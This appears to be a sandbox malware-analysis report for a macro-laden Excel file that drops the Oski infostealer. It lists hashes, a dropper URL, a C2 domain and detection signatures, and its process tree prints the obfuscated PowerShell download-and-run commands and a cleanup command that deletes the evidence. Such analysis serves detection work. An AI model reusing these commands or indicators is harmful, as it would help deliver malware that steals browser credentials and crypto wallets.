Analysis

  • max time kernel
    108s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04/08/2021, 19:33

General

  • Target

    691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm

  • Size

    13KB

  • MD5

    2be7123060d0a3294b6fabff5553da30

  • SHA1

    a62e852b641ff566c41ef49ffb60b2cff377acdc

  • SHA256

    691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f

  • SHA512

    d5fdf9eef61e3f498f268285870b38c679b9f692f5ac74b269688a20691da8c660c35dcb05f1ff3b6e3e2c30d4b39dc983ce71dc0d32b168d1b1a998ff750856

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://iurl.vip/3osyi

Extracted

Family

oski

C2

notedemo.axfree.com

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DoFPS.exe
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\DoFPS.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3272
        • C:\Users\Admin\AppData\Local\Temp\DoFPS.exe
          "C:\Users\Admin\AppData\Local\Temp\DoFPS.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1716
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            5⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:1764
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1764 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe & RD /S /Q C:\\ProgramData\\696946246624170\\* & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3364
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /pid 1764
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/3osyi',$env:Temp+'\DoFPS.exe')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3148

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1716-302-0x0000000005C90000-0x0000000005C91000-memory.dmp

          Filesize

          4KB

        • memory/1716-301-0x0000000005100000-0x0000000005105000-memory.dmp

          Filesize

          20KB

        • memory/1716-300-0x0000000005120000-0x0000000005121000-memory.dmp

          Filesize

          4KB

        • memory/1716-298-0x0000000000810000-0x0000000000811000-memory.dmp

          Filesize

          4KB

        • memory/1764-307-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

        • memory/1764-303-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

        • memory/3148-277-0x0000019A121D0000-0x0000019A121D1000-memory.dmp

          Filesize

          4KB

        • memory/3148-289-0x0000019A2A856000-0x0000019A2A858000-memory.dmp

          Filesize

          8KB

        • memory/3148-275-0x0000019A2A850000-0x0000019A2A852000-memory.dmp

          Filesize

          8KB

        • memory/3148-276-0x0000019A2A853000-0x0000019A2A855000-memory.dmp

          Filesize

          8KB

        • memory/3272-270-0x00000119ED680000-0x00000119ED682000-memory.dmp

          Filesize

          8KB

        • memory/3272-265-0x00000119ED790000-0x00000119ED791000-memory.dmp

          Filesize

          4KB

        • memory/3272-297-0x00000119ED686000-0x00000119ED688000-memory.dmp

          Filesize

          8KB

        • memory/3272-272-0x00000119ED683000-0x00000119ED685000-memory.dmp

          Filesize

          8KB

        • memory/4016-122-0x00007FFB7C9F0000-0x00007FFB7DADE000-memory.dmp

          Filesize

          16.9MB

        • memory/4016-118-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-121-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-114-0x00007FF66FA30000-0x00007FF672FE6000-memory.dmp

          Filesize

          53.7MB

        • memory/4016-117-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-116-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-115-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-123-0x00007FFB7AAF0000-0x00007FFB7C9E5000-memory.dmp

          Filesize

          31.0MB

        • memory/4016-325-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-326-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-327-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB

        • memory/4016-328-0x00007FFB5C580000-0x00007FFB5C590000-memory.dmp

          Filesize

          64KB